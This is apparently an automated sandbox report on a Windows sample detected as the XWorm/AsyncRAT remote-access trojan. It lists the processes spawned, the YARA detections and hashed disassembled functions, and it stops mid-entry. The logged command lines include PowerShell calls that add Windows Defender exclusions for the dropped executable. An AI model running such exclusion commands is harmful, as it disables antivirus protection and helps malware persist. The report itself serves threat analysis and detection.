JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2158779274.000002184E808000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:23:09
Start date:	26/03/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Imagebase:	0x1e3b7500000
File size:	45'472 bytes
MD5 hash:	DC67ADE51149EC0C373A379473895BA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3409147293.000001E3C9938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3409147293.000001E3C9848000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3409147293.000001E3C9898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3409147293.000001E3C9820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	18:23:15
Start date:	26/03/2024
Path:	C:\Users\user\AppData\Local\Temp\btjxg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\btjxg.exe"
Imagebase:	0xde0000
File size:	152'064 bytes
MD5 hash:	2649EF15CF6004B05C80ABD825CD594E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	18:23:18
Start date:	26/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:23:18
Start date:	26/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:23:21
Start date:	26/03/2024
Path:	C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Imagebase:	0x20924e90000
File size:	646'656 bytes
MD5 hash:	1D562EAA3E33451A40F60C976C6F4BC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2610110087.0000020937418000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2610110087.0000020937300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2610110087.0000020937378000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2610110087.0000020937328000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:23:34
Start date:	26/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:23:34
Start date:	26/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:23:51
Start date:	26/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:23:51
Start date:	26/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF848A81B44 Relevance: 2.3, Strings: 1, Instructions: 1008COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848A81EF9

Memory Dump Source

Source File: 00000000.00000002.2140660024.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848a80000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: c9880fcf7c59f2151df1ed90ef942c2378d1b0effa8a9b270637783ce4042a19
Instruction ID: b6019995bff4dc84c258b424073e68fc979b22b7c3d2c4b1dfc2128cd6f1744a
Opcode Fuzzy Hash: c9880fcf7c59f2151df1ed90ef942c2378d1b0effa8a9b270637783ce4042a19
Instruction Fuzzy Hash: 8852DA21E0EE8B1FE3A5F72C142A23526D2EF95685F5905BAC04DC32D7EE5CDC06436A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B60D41 Relevance: 1.8, Strings: 1, Instructions: 522COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848B61556

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4f0213e78f70484316f81c21edaf4e97344b7fe3ba4c466620cde8252bdb7641
Instruction ID: a0bf3e717af4cf35c983c907b42c7c75c2627501a435d0561b4868952079416a
Opcode Fuzzy Hash: 4f0213e78f70484316f81c21edaf4e97344b7fe3ba4c466620cde8252bdb7641
Instruction Fuzzy Hash: A7F1D422F0CD5A8FE7A9EA2C90552B963D2FF997D0F440179D40ED77C6DE28AC02474A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B61FFA Relevance: 1.8, Strings: 1, Instructions: 518COMMON

Download Yara Rule

Strings

$3_^, xrefs: 00007FF848B62001

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: $3_^
API String ID: 0-2580120020
Opcode ID: f55b023bd7b2bc4da1e8e9ee25c098a017a8bd1082f5871dd69bd73f2ef24c50
Instruction ID: 5c2357117cbd1ac7021990d2f3d719e17a505fb69661503eeda0a1e701cc410b
Opcode Fuzzy Hash: f55b023bd7b2bc4da1e8e9ee25c098a017a8bd1082f5871dd69bd73f2ef24c50
Instruction Fuzzy Hash: 0EC1C531A1CA4A8FEB85EF28D4556FA77E1FF55780F1400BAD409C7196DE38E892C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B0848 Relevance: 1.3, Instructions: 1293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d89e14a54e5a80adb58a860db79f9a0976be4f284ea98c5da3667e31902be1
Instruction ID: 06f9c5b395b05d99ff7fb7ad0a0be76256075445c19d980462c522aa4815ec56
Opcode Fuzzy Hash: e2d89e14a54e5a80adb58a860db79f9a0976be4f284ea98c5da3667e31902be1
Instruction Fuzzy Hash: 83920421E0CE4A4FE7D9EA2894596B57BD2FFB6381F0401B6D40DC72D3CE28AD868705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B5B12 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7618aa0e1a3422933b59280e4ff4adacd39c8483f88096da41aa04b497b5b1c1
Instruction ID: 38b3558c6edfa3573bb492ef5a208c15ae1f191f49fae95565040391daff9a80
Opcode Fuzzy Hash: 7618aa0e1a3422933b59280e4ff4adacd39c8483f88096da41aa04b497b5b1c1
Instruction Fuzzy Hash: D832E431E0CE4A5FEB99FF2894556A9BBD2FFA5781F1401B9D00DC7287CE28AC858744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1AB1 Relevance: .7, Instructions: 675COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f8dd8831d1f549cd645cd52107051f0f96bdfae0d46e1d44b596662b080e0f
Instruction ID: f7db3e8955a4231554a3edfc40008cb650c02f5ea7dc669fa145ae23ce6069e4
Opcode Fuzzy Hash: 75f8dd8831d1f549cd645cd52107051f0f96bdfae0d46e1d44b596662b080e0f
Instruction Fuzzy Hash: 5322F831A0CD498FDBA8EB58C4596697BE1FFA9342F0401B9D00DC76A6DF28AC46CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1BA9 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9204ed00518b43830eeb2270a927ac5819f74e87f22fe1d3bd990553eac7ccd2
Instruction ID: e59fd9bdd3b4dd720e8925cba5bba20c3adccc0ad0715b8bb50b91df8ee48656
Opcode Fuzzy Hash: 9204ed00518b43830eeb2270a927ac5819f74e87f22fe1d3bd990553eac7ccd2
Instruction Fuzzy Hash: 4212E231A0CE0D4FD758EA58C88A67877E1FFA5341F2502B9C99FC7296DE24AC438785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B5593 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6fd73068e5202b27bbfc808079d0398f112f7df3c82d73a31c1d4fe7bec56a
Instruction ID: 93d2aa4c840807d6704a3668c43a555d8823a4a44988547034db8439863c9e51
Opcode Fuzzy Hash: 5e6fd73068e5202b27bbfc808079d0398f112f7df3c82d73a31c1d4fe7bec56a
Instruction Fuzzy Hash: CEB12A61E0CE4A9FD799EB2894956667BE1FFB6381B1540BAC40DC72C7CE38ED468700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B15A9 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5054f9123a580be1376e2f9408db0ee5623f94d1458c390a4d49430145244691
Instruction ID: da755848fbf6205529fea6282f86dac8f916c53c532eb50bc2273b8157735f5f
Opcode Fuzzy Hash: 5054f9123a580be1376e2f9408db0ee5623f94d1458c390a4d49430145244691
Instruction Fuzzy Hash: C5B109B2D0CB899FE785DF3898593AA7FE1FBA6381F5500B7C04CC72D6DA2849468711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1304 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

/N_^, xrefs: 00007FF8489B1501

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: /N_^
API String ID: 0-316800470
Opcode ID: 4cfd21397b25a0c2d8eeeb521ab5d7333d6578aadfebb3e75e72d8e56ae66055
Instruction ID: 2484b8f298fb02bade95fe82be6e4257fac4cedf0f06344253fbcf80ab066703
Opcode Fuzzy Hash: 4cfd21397b25a0c2d8eeeb521ab5d7333d6578aadfebb3e75e72d8e56ae66055
Instruction Fuzzy Hash: 7291C627B0D9A15FD3117BBDB8055EDBF90EF926BBB0841B7C288CA093D908245983E5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B13FB Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

/N_^, xrefs: 00007FF8489B1501

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: /N_^
API String ID: 0-316800470
Opcode ID: f9df25d4e37d7591ad112c872067d2a06886ff21e9206d8e55802a5413e16a2d
Instruction ID: 91992bbcd92bc01e6d5ab53bda51c2acdbb4c7d4f9667b380bbd4dd46f4efce6
Opcode Fuzzy Hash: f9df25d4e37d7591ad112c872067d2a06886ff21e9206d8e55802a5413e16a2d
Instruction Fuzzy Hash: 7551B327A0D9665ED6113BECB8095EDBF90EF927F7F084173D288CA093D908244583E9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A82481 Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140660024.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848a80000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc9650253704ee351a36c2b76b18c59f1b8558d4ca1ab0b1c468e2fe5d7e46c
Instruction ID: 94c985bc6b42b85e1c01213f43833bde5d14e0c58a6055c61d3985ddffda29ca
Opcode Fuzzy Hash: 1bc9650253704ee351a36c2b76b18c59f1b8558d4ca1ab0b1c468e2fe5d7e46c
Instruction Fuzzy Hash: F1F1A621E0DD5B1FEAAAF62C206627D16D2FF986D5F59017AC00DC32C7DF5CA806436A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B626A5 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0964f74f59bce7486456b1279aa0a2ecfda987925c0cb27a14b579a5df4a72
Instruction ID: ade7761b3ac5eb765464fd3cc9d0dd2d16f1802d1aa9584e66f7f948d2ce56be
Opcode Fuzzy Hash: 4e0964f74f59bce7486456b1279aa0a2ecfda987925c0cb27a14b579a5df4a72
Instruction Fuzzy Hash: A991D23090CA4D8FEB54EB68D849BE9BBE1EF55350F1440BAD40DD7292DB24A885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B0C10 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da65fcf0aa5aad8c33b32efb33734e8f8df8ac768fd608e7b124093a7edd38d
Instruction ID: 2f357f9327ff40e1be291cba701b57c06476492f150819945f335412afe54e96
Opcode Fuzzy Hash: 6da65fcf0aa5aad8c33b32efb33734e8f8df8ac768fd608e7b124093a7edd38d
Instruction Fuzzy Hash: 55519131E0CA4E9FDB98EB6898596BD7BE1FFA8341F140179D44DE3282CB3468018759

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B4A55 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085d4204b542207b369555351250d20b212b285c42ec1e3e6b6be0840efd8ddc
Instruction ID: e4eb66abd804e7151a6a491fb4c924da5fffc009a06cb38ab9bf78f4454fd0d9
Opcode Fuzzy Hash: 085d4204b542207b369555351250d20b212b285c42ec1e3e6b6be0840efd8ddc
Instruction Fuzzy Hash: A2512B3290DA5D1FE759AB2898662F97F90FF92792F0802FBD14CC7193CE2818458755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B872C Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31cb4be17444bccca4bb2e2bab1985fbde3e4d556a13e3f367c9a06dbf42cde5
Instruction ID: 60a7c952125fc6302bb3d93754a16342f5ea1a3cda6c95231662b6ab6afd4706
Opcode Fuzzy Hash: 31cb4be17444bccca4bb2e2bab1985fbde3e4d556a13e3f367c9a06dbf42cde5
Instruction Fuzzy Hash: E641F622D0DECA5FD759A73898591E47FA1FF6A2D1B0802FBC04DC7197DE2894468341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B0A89 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4bb824ac3ee674b270c3e7a6e1a314cd9928f4906cd7288bbd67a1f5a5ab13
Instruction ID: f64327dfc96352f001bf7ed851f595f4adae833d2710bdb44132c225e7c0470c
Opcode Fuzzy Hash: 8e4bb824ac3ee674b270c3e7a6e1a314cd9928f4906cd7288bbd67a1f5a5ab13
Instruction Fuzzy Hash: B4514931A0DF961FD755EB3898296A57FE0FF922A5F0802BAD049C71D3DE1C98428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B6186D Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef9db58ec546cd26c9e39e977c51efdd1071856b4d047f22f31d1d131c4abad
Instruction ID: f0c08b7f7604d60dc9fdd133a7c8ecabdb6ed1159c2743bcbcd068fb6981c13b
Opcode Fuzzy Hash: cef9db58ec546cd26c9e39e977c51efdd1071856b4d047f22f31d1d131c4abad
Instruction Fuzzy Hash: 85418131B1CD1E8FEB95FB2C9054A69B3E1EF98380B5501B6D40DD72A6DF24EC428746

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B624E9 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13593b14c235fd4ba52d394f55383eae2689ae45d244af8488e9d676971fd8d
Instruction ID: 4efc51c5a0a65d1df2805350c10ef4114e961e1527d0092717a7c032e9cce36e
Opcode Fuzzy Hash: e13593b14c235fd4ba52d394f55383eae2689ae45d244af8488e9d676971fd8d
Instruction Fuzzy Hash: 53313732D4D9964FF7A6A22C68255F13BD1FF95360B0901B6D40CDB9A2DE18EC428356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B60E42 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa59462c49f0febd953f19c8f2df4a2b7e4d827ded42161745a1cb56b7193668
Instruction ID: 64c66fe5bd2217b47e6c308a19f16b6107dd0a7638b93b299445cce082fcfe37
Opcode Fuzzy Hash: aa59462c49f0febd953f19c8f2df4a2b7e4d827ded42161745a1cb56b7193668
Instruction Fuzzy Hash: F231A232E1CA198FDB58FE1CA8520F873E1FB98364F10057AE44DD3642DF25E842878A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A8233F Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140660024.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848a80000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd7b658bfada84ab06a20d637baae0c34b0f0a9ebabfaef8821706fdd8169d1
Instruction ID: 0d14980dae3d0bd23622b4e2d85153af301f6905bf0def6b874741bd54d87574
Opcode Fuzzy Hash: fcd7b658bfada84ab06a20d637baae0c34b0f0a9ebabfaef8821706fdd8169d1
Instruction Fuzzy Hash: 44318221F1DD4A0FE695F62C146623955C2EFD8685F5A0179D40DC32D6EE6CEC02436A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B2550 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db31f532b77d67331ebc838ad215e2624909092cc3607f03afbc54a58cbb586d
Instruction ID: 0c1e2c978667c9691d275a6324244e389f8cfe905d7fc40ae853777d03ae5595
Opcode Fuzzy Hash: db31f532b77d67331ebc838ad215e2624909092cc3607f03afbc54a58cbb586d
Instruction Fuzzy Hash: E731283090CE098FDB6CEE58C8595697BE1FFA4352F1001BAD40DC3696DF29AD42C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B604B5 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142641906.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848b60000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f58ad225d1c225ef139b9f2a2257397a1de4370526d92b7ad70ee65a1c788b
Instruction ID: 88ec06a60276167a1042329ebaf54dc61e0723e726deac5ab8e3078c8d6d4677
Opcode Fuzzy Hash: b3f58ad225d1c225ef139b9f2a2257397a1de4370526d92b7ad70ee65a1c788b
Instruction Fuzzy Hash: E5313E3190DF864FD329EB2858555A97FE0EF56761F0502AFE08DD35D3CE145806C786

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B0931 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
